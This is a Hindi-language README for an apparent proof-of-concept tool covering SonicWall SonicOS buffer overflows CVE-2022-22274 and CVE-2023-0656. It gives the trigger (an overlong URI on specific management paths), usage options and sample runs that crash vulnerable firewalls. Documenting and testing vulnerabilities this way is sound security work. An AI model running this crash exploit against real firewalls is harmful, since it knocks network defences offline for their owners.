
SonicWall SonicOS स्टैक-आधारित बफर ओवरफ्लो (CVE-2022-22274, CVE-2023-0656) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से कमजोर फायरवॉल के सुरक्षित परीक्षण या क्रैश शोषण को सक्षम बनाता है।

24 मार्च, 2022 को, SonicWall ने निम्नलिखित विवरणों के साथ एक सलाहकार जारी किया:
SonicOS में HTTP अनुरोध के माध्यम से एक स्टैक-आधारित बफर ओवरफ्लो भेद्यता एक दूरस्थ अप्रमाणित हमलावर को सेवा अस्वीकार (DoS) उत्पन्न करने या संभावित रूप से फ़ायरवॉल में कोड निष्पादन करने की अनुमति देती है।
नोट: यह भेद्यता केवल "वेब प्रबंधन" इंटरफ़ेस को प्रभावित करती है, SonicOS SSLVPN इंटरफ़ेस प्रभावित नहीं होता है।
2 मार्च, 2023 को, SonicWall ने एक और समान सलाहकार जारी किया:
SonicOS में एक स्टैक-आधारित बफर ओवरफ्लो भेद्यता एक दूरस्थ अप्रमाणित हमलावर को सेवा अस्वीकार (DoS) उत्पन्न करने की अनुमति देती है, जिसके कारण प्रभावित फ़ायरवॉल क्रैश हो सकता है।
नोट: यह भेद्यता केवल "वेब प्रबंधन" इंटरफ़ेस को प्रभावित करती है, SonicOS SSLVPN इंटरफ़ेस प्रभावित नहीं होता है।
दोनों समस्याएं एक ही कमजोर कोड पैटर्न से संबंधित हैं और एक ही शोषण पेलोड का उपयोग करती हैं, लेकिन विभिन्न URI पथों पर ट्रिगर होती हैं।
बफर ओवरफ्लो 1024 वर्णों से अधिक लंबे URI पथ वाले HTTP अनुरोध के माध्यम से ट्रिगर होता है। CVE-2022-22274 का शोषण /resources/ पर या उन्नत खतरा संरक्षण URI पथ (/atp/ यदि सक्षम हो या // यदि अक्षम हो) पर किया जा सकता है। CVE-2023-0656 का शोषण /stats/ या /Security_Services पर किया जा सकता है।
इस रिपॉजिटरी में सभी चार URI पथों पर एक लक्ष्य की शोषणक्षमता के लिए परीक्षण करने हेतु एक प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट है। यह डिफ़ॉल्ट रूप से एक सुरक्षित परीक्षण करता है, लेकिन बग्स का शोषण करने और लक्ष्य को क्रैश करने की क्षमता भी रखता है।
नोट: अपनी डिफ़ॉल्ट कॉन्फ़िगरेशन में, थोड़े समय के भीतर लगातार 3 क्रैश होने पर SonicOS डिवाइस को डीबग मोड में रीबूट कर देगा और जब तक कोई व्यवस्थापक इसे वापस ऑनलाइन नहीं लाता, तब तक यह अप्राप्य रहेगा। जिम्मेदारी से उपयोग करें!
Python 3 स्थापित करें और python -m pip install -y argparse चलाएँ।
usage: poc.py [-h] [-t] [-x {1,2,3,4,5}] [-s] target
positional arguments:
target hostname[:port] (port defaults to 443)
options:
-h, --help show this help message and exit
-t, --test safely test for vulnerability (default action)
-x {1,2,3,4,5}, --exploit {1,2,3,4,5}
exploit the target (trigger a crash). 1=/resources/ 2=// 3=/atp/ 4=/stats/ 5=/Security_Services
-s, --skip-header-check
skip initial check for SonicWALL response header
Test a vulnerable target:
$ ./poc.py 192.168.50.29
[*] Checking https://192.168.50.29:443
[+] Confirmed target is running SonicOS
[*] Testing CVE-2022-22274 at /resources/
[+] Target looks vulnerable! (redirected)
[*] Testing CVE-2022-22274 at //
[+] Target looks vulnerable! (redirected)
[*] Testing CVE-2022-22274 at /atp/
[-] Target does not appear to be affected (HTTP 404)
[*] Testing CVE-2023-0656 at /stats/
[+] Target looks vulnerable! (redirected)
[*] Testing CVE-2023-0656 at /Security_Services
[+] Target looks vulnerable! (redirected)
Exploit a vulnerable target:
$ ./poc.py -x 1 192.168.50.29
[*] Checking https://192.168.50.29:443
[+] Confirmed target is running SonicOS
[*] Triggering exploit at /resources/
[+] Exploit succeeded! (target unavailable)
Test and exploit a patched target:
$ ./poc.py -tx 4 192.168.50.31
[*] Checking https://192.168.50.31:443
[+] Confirmed target is running SonicOS
[*] Testing CVE-2022-22274 at /resources/
[-] Target appears to be patched (empty response)
[*] Testing CVE-2022-22274 at //
[-] Target appears to be patched (empty response)
[*] Testing CVE-2022-22274 at /atp/
[-] Target does not appear to be affected (HTTP 404)
[*] Testing CVE-2023-0656 at /stats/
[-] Target appears to be patched (empty response)
[*] Testing CVE-2023-0656 at /Security_Services
[-] Target appears to be patched (empty response)
[*] Triggering exploit at /stats/
[-] Exploit failed (target responded)
यह प्रोजेक्ट GNU GPL 3.0 लाइसेंस के अंतर्गत लाइसेंस प्राप्त है।